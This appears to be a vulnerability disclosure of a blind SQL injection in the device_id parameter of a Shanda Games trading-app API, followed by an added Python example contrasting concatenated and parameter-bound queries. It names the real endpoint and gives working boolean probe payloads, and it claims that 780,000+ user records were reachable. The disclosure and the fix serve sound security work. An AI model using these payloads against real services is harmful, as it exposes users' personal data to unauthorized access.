SQL injection in a Shanda Games app (affecting 780,000+ user records)

Target: the Shanda Games G买卖 Android app. Testing found SQL injection at the following location (injected parameter: device_id, boolean-based blind):
http://ymm123.sdo.com/api/tradeapi/config?src_code=10&method=indexWebViewJump&params={"app_version":"193","device_id":"A0000038518D0C-d3ff252e6543971a"}
Payload:
http://ymm123.sdo.com/api/tradeapi/config?src_code=10&method=indexWebViewJump&params={"app_version":"193","device_id":"A0000038518D0C-d3ff252e6543971a' and 'a'='a"}
http://ymm123.sdo.com/api/tradeapi/config?src_code=10&method=indexWebViewJump&params={"app_version":"193","device_id":"A0000038518D0C-d3ff252e6543971a' and 'a'='b"}
1. Current database user

2. User table, covering 780,000+ user records; I did not dig any deeper~
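
Added example, not part of the original report and not the vendor's code: it shows why the two device_id probes above answer differently when the value is concatenated into the query, and why they answer identically once the value is bound as a parameter. The table, column and function names are assumptions, and the data is constructed; the report does not show the server-side query.

```python
import json
import sqlite3

BASE_ID = "A0000038518D0C-d3ff252e6543971a"  # device_id value from the report


def make_db():
    """Constructed in-memory table; the real schema is not shown in the report."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE device_config (device_id TEXT PRIMARY KEY, jump_url TEXT)")
    db.execute("INSERT INTO device_config VALUES (?, ?)", (BASE_ID, "/index"))
    return db


def lookup_concat(db, params_json):
    """Vulnerable pattern: device_id is spliced into the SQL text."""
    device_id = json.loads(params_json)["device_id"]
    sql = "SELECT jump_url FROM device_config WHERE device_id = '" + device_id + "'"
    return db.execute(sql).fetchone()


def lookup_bound(db, params_json):
    """Hardened pattern: device_id is passed as a bound parameter, never as SQL."""
    device_id = json.loads(params_json)["device_id"]
    if not isinstance(device_id, str):
        raise ValueError("device_id must be a string")
    sql = "SELECT jump_url FROM device_config WHERE device_id = ?"
    return db.execute(sql, (device_id,)).fetchone()


def probe(lookup):
    """Return whether a row came back for the plain id and the two probes."""
    db = make_db()
    ids = [BASE_ID, BASE_ID + "' and 'a'='a", BASE_ID + "' and 'a'='b"]
    return [lookup(db, json.dumps({"app_version": "193", "device_id": i})) is not None
            for i in ids]


if __name__ == "__main__":
    print("concatenated:", probe(lookup_concat))  # probes differ: boolean oracle
    print("bound:       ", probe(lookup_bound))   # probes identical: no oracle
```

With the bound query both probe strings are compared as literal device ids, so neither matches a row and the response no longer depends on the injected condition.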